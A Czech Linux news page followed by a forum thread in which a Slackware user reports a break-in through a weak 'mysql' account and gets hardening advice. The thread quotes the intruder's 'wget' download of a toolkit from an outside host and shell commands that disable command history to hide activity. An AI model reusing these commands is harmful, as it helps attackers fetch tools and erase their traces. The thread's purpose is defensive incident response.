Rocky Linux byl vydán v nové stabilní verzi 9.4. Přehled novinek v poznámkách k vydání.
Dellu byla odcizena databáze zákazníků (jméno, adresa, seznam zakoupených produktů) [Customer Care, Bleeping Computer].
V lednu byl otevřen editor kódů Zed od autorů editoru Atom a Tree-sitter. Tenkrát běžel pouze na macOS. Byl napevno svázán s Metalem. Situace se ale postupně mění. V aktuálním příspěvku Kdy Zed na Linuxu? na blogu Zedu vývojáři popisují aktuální stav. Blíží se alfa verze.
O víkendu 11. a 12. května lze navštívit Maker Faire Prague, festival plný workshopů, interaktivních činností a především nadšených a zvídavých lidí.
Byl vydán Fedora Asahi Remix 40, tj. linuxová distribuce pro Apple Silicon vycházející z Fedora Linuxu 40.
Představena byla služba Raspberry Pi Connect usnadňující vzdálený grafický přístup k vašim Raspberry Pi z webového prohlížeče. Odkudkoli. Zdarma. Zatím v beta verzi. Detaily v dokumentaci.
Byla vydána verze R14.1.2 desktopového prostředí Trinity Desktop Environment (TDE, fork KDE 3.5). Přehled novinek v poznámkách k vydání, podrobnosti v seznamu změn.
Dnešním dnem lze již také v Česku nakupovat na Google Store (telefony a sluchátka Google Pixel).
Apple představil (keynote) iPad Pro s čipem Apple M4, předělaný iPad Air ve dvou velikostech a nový Apple Pencil Pro.
Richard Biener oznámil vydání verze 14.1 (14.1.0) kolekce kompilátorů pro různé programovací jazyky GCC (GNU Compiler Collection). Jedná se o první stabilní verzi řady 14. Přehled změn, nových vlastností a oprav a aktualizovaná dokumentace na stránkách projektu. Některé zdrojové kódy, které bylo možné přeložit s předchozími verzemi GCC, bude nutné upravit.
Používám Slackware 10.0.
Jádro distribuční s jedinou drobnou úpravou.
Většina software pochází z distribučních balíčků, ale mám i nějaké kompilované ze zdrojových kódů a předkompilované z http://linuxpackages.net/.
Včera večer jsem pracoval na počítači a zůstal jsem připojený k internetu i přes to, že jsem nic nestahoval ani nikde nebrouzdal. Mám externí modem, a tak slyším každý přenos dat. Asi po hodině ticha najednou začal modem pracovat (typické skřípění, nebo šumění z reproduktoru modemu). Když jsem si toho po chvíli všiml, začal jsem pátrat po tom, co je tomu příčinou. Nejprve mě napadl poštovní klient, ale nebyl spuštěný. Spustil jsem tcpdump a odchytil nějaké spojení na adresu http://sigma.hostingfacile.net/. Dalším krokem bylo spuštění ps aux kde jsem ve výpisu našel přihlášeného uživatele mysql. Vzhledem k tomu, že počítač využívám sám a MySql jako službu mám vypnutou, byla pro mě návštěva uživatele mysql opravdovým překvapením. Při dalším výpisu ps aux už na mě "vybafl" uživatel mysql připojený hned několikrát. A co víc! Jeden z jeho procesů byl wget -c http://sufletl.home.ro/psy.tgz. A to byl právě ten okamžik, kdy jsem s velkou silou vytrhl kabel z modemu.
Po odpojení jsem chvíli přemýšlel a vydal jsem se na průzkum napáchaných škod. Nejprve do /etc/passwd, kde jsem objevil toto:
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bashMyslím, že by tam neměl být ten shell, ale jistý si nejsem.
Přihlásil jsem se jako uživatel mysql a hledal v domovském adresáři /var/lib/mysql soubor .bash_history, ale kromě mých databází tam nic nebylo. Že by něco takového?:
unset HISTFILE unset HISTSAVE history -n unset WATCH export HISTFILE=/dev/null
Smazal jsem uživatele mysql a připojil k internetu a za neustálého kontrolování přenosu jsem stáhl inkriminovaný soubor psy.tgz. Myslel jsem, kdovíco najdu, ale jde o celkem běžný soft. Trochu googlu a našel jsem tohle. Po přečtení reakcí jsem narazil na exploit, ale z toho nejsem dvakrát moudrý.
Taky jsem proběhl všechny tmp adresáře a ve /var/tmp/ jsme objevil adresář .bash, který odpovídá obsahu psy.tgz. Je s podivem, že tam byl celý když jsem viděl jak se stahuje... leda bych připojení ukončil těsně po stažení.
Otázky zní:
Jak získal útočník přístup do mého počítače?
Jak tomu napříště zabránit?
Jaké kroky podniknout?
Stala by se to, i kdybych použil pouze distribuční software - chyba v zabezpečení software třetích stran?
Co jsem zanedbal?
Jak jsou na tom jiné distribuce? Mandrake?
Co si o tom myslíte?
Jistě je pravdou, že správný administrátor systému by situaci neměl nechat dojít až do tohoto stavu a měl by ji předcházet. Především pravidelnou aktualizací a bezpečnostními záplatami. Stalo se.
Připojuji se teď k internetu s velkou opatrností, spouštím okamžitě tcpdump a neustále kontroluji spuštěné procesy. A to rozhodně není nic příjemného. Budu rád, podělíte-li se se mnou o své zkušenosti, nápady a rady.
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash
ten zbytok je fakt divny
Domain name: hostingfacile.net Registrant Contact: Eurologon S.r.l. Enzo Baiotto (domains@eurologon.com) +39.0119473512 Fax: +39 011 9409691 Via Roma 30 Trofarello, TO 10028 IT Administrative Contact: Eurologon S.r.l. Enzo Baiotto (hostmaster@eurologon.com) +39.0119473512 Fax: +39.0115503318 Via Roma 30 Trofarello, TO 10028 IT Billing Contact: Eurologon S.r.l. Enzo Baiotto (hostmaster@eurologon.com) +39.0119473512 Fax: +39.0115503318 Via Roma 30 Trofarello, TO 10028 IT Technical Contact: Eurologon S.r.l. Enzo Baiotto (hostmaster@eurologon.com) +39.0119473512 Fax: +39.0115503318 Via Roma 30 Trofarello, TO 10028 IT Status: Locked Name Servers: ns1.hostingfacile.net ns2.hostingfacile.net Creation date: 18 Apr 2002 16:38:18 Expiration date: 18 Apr 2006 16:38:18
ori.. bash export PATH="." httpd exit port-ul bouncerului este 50001 .. #HackTeam rullez...!No, spust si tam chkrootkit a rkhunter a uvidis sam...
Apache 1.3.31 [ Vulnerable ] PHP 4.3.7 [ Vulnerable ] Checking for allowed protocols... [ Warning (SSH v1 allowed) ]To jsem opravil...
Ano, používám jádro 2.4.x.
Stínová hesla - shadowing používám.
Iptables jsem nastavil takhle, snad to jako základ stačí:
iptables -P INPUT DROP iptables -P OUTPUT ACCEPT iptables -P FORWARD DROP iptables -A INPUT -i ! ppp+ -j ACCEPT iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT iptables -A INPUT -j LOG --log-prefix "INPUT drop: "Tripwire jsem naistaloval, ale něco je špatně:
Please enter your local passphrase: Parsing policy file: /etc/tripwire/tw.pol Generating the database... *** Processing Unix File System *** Software interrupt forced exit: Segmentation FaultVerze Tripwire:
Tripwire(R) 2.3.0.47 for LinuxNerozumím co znamená "povýšení práv".
SSH potřebuji. Jaký význam má zakázat přístup rootovi přes ssh, když se může přilásit běžný uživatel a použít su root? Přihlašování pomocí klíčů je možná příliš, bude stačit dostatečně silné heslo. Telnet zapnutý nemám.
Firewall jsem nastavil viz. výše. Nevím však, jestli je to dost paranoidně.
Přihlašování pomocí klíčů je možná příliš, bude stačit dostatečně silné heslo.Je to Vas nazor, nebudu Vam ho brat. Muzete ale zarucit, ze vsechny nezamcene ucty na tom pocitaci budou mit dostatecne silna hesla?
Jaký význam má zakázat přístup rootovi přes ssh, když se může přilásit běžný uživatel a použít su root?Da se nastavit, ze
su root
muze pouzit pouze pokud ucet, ze ktereho tak cini, je ve skupine wheel. A treba ucet, pod kterym se utocnik prihlasi, ve wheel nebude.
Firewall jsem nastavil viz. výše. Nevím však, jestli je to dost paranoidně.Podle me ano (predpokladam, ze conntrack pouzivate, jinak RELATED tam je zbytecne). Jedna poznamka, lepsi nez:
iptables -A INPUT -i ! ppp+ -j ACCEPTje:
iptables -A INPUT -i lo -j ACCEPTProc povolovat pristup ze vsech rozhrani krome ppp, kdyz ve skutecnosti jedine co potrebujete je pristup z lo? I pokud tam mate eth rozhrani pripojene k siti, ktere duverujete, je vzdy lepsi to uvest explicitne nez povolovat pausalne.
Chyba byla nejspíš právě ve slabém hesle uživatele mysql a ta se mohla stát na kterékoliv distribuci. Rozhodně neinstaluji a nespouštím každou kravinu, právě naopak, snažím se minimalizovat instalovaný software.
Přestože problém nebyl zapříčiněn chybou, která mohla být zazáplatována, budu teď ale sledovat adresář patches pečlivěji. Po průniku do neopatchovného systému by měl rozhodně útočník jednodušší prácí např. s výběrem exploitu.
Jádra 2.4.x patří "bezpečnějším" vzhledem k jejich konzervativnímu přístupu k zařazování nových fičurek.
Zřejmě jsem se nechal příjemně ukolébat představou bezpečnosti a nevěnoval jsem ji takovou pozornost jakou by si zasloužila.
Tiskni Sdílej: